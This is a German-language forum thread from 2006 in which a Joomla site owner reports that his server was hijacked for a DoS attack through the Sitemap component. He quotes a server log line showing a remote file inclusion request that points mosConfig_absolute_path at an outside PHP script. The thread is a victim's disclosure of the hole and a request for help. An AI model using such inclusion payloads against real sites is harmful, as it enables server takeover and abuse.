Sicherheitsproblem mit Sidemap

**saxman** · 08.08.2006 16:06

Hallo zusammen,

am Wochenende wurde mein Server gehackt und für eine DoS Attacke mißbraucht. Mein Partner und ich haben heraus gefunden, das der Angreifer über das Sidemap Modul Code einschleusen konnte. Hier der Auszug auf der Logdatei meines Server:

193.25.197.123 - - [18/Jul/2006:17:50:33 +0200] "GET /cms/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.podgorz.cc/en5.php?? HTTP/1.0" 200 1086 "-" "Mozilla/5.0"

Ich habe die Komponente Sidemap 2.0 verwendet. Ausschlaggebend war die Datei sitemap.xml.php (siehe Logeintrag). Derzeit ist mein Apache noch deaktiviert, ich habe aber diese Komponente aus meinem Joomla entfernt.
Ist diese Lücke schon bekannt?

Gruss saxman

**RasCas** · 08.08.2006 16:13

Jepp, ist in der Liste kritischer Komponenten gelistet.

**saxman** · 08.08.2006 16:17

Dumme Frage meineseits.........wo finde ich diese Liste?

**bjoernherold** · 08.08.2006 19:36

Hallo,

weiß jemand ob diese Sicherheitslücken auch in Joomap vorhanden sind ?

Gruß,

Björn

**RasCas** · 08.08.2006 19:54

Steht jedenfalls nicht in der Liste
... wobei das noch nichts heissen muss.

PS: Für die, die die Liste immer noch nicht gefunden haben.

1. Post im Sicherheitsforum -> erstem link folgen -> erster Post im engl. Forum

**flotte** · 12.08.2006 13:42

Zitat von saxman

Hallo zusammen,

am Wochenende wurde mein Server gehackt und für eine DoS Attacke mißbraucht. Mein Partner und ich haben heraus gefunden, das der Angreifer über das Sidemap Modul Code einschleusen konnte.

Über dieses Modul werden auch iframes in den Code gesetzt, die beim Aufruf Viren hochladen.

Thema: Sicherheitsproblem mit Sidemap

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Sicherheitsproblem mit Sidemap

Erhielt Danksagungen von:

Joomap

Ähnliche Themen

Sicehrheitsproblem bei Zoom-Galery

Sicherheitsproblem oder Horax ??

Ich hab ein Sicherheitsproblem

Lesezeichen

Lesezeichen

Berechtigungen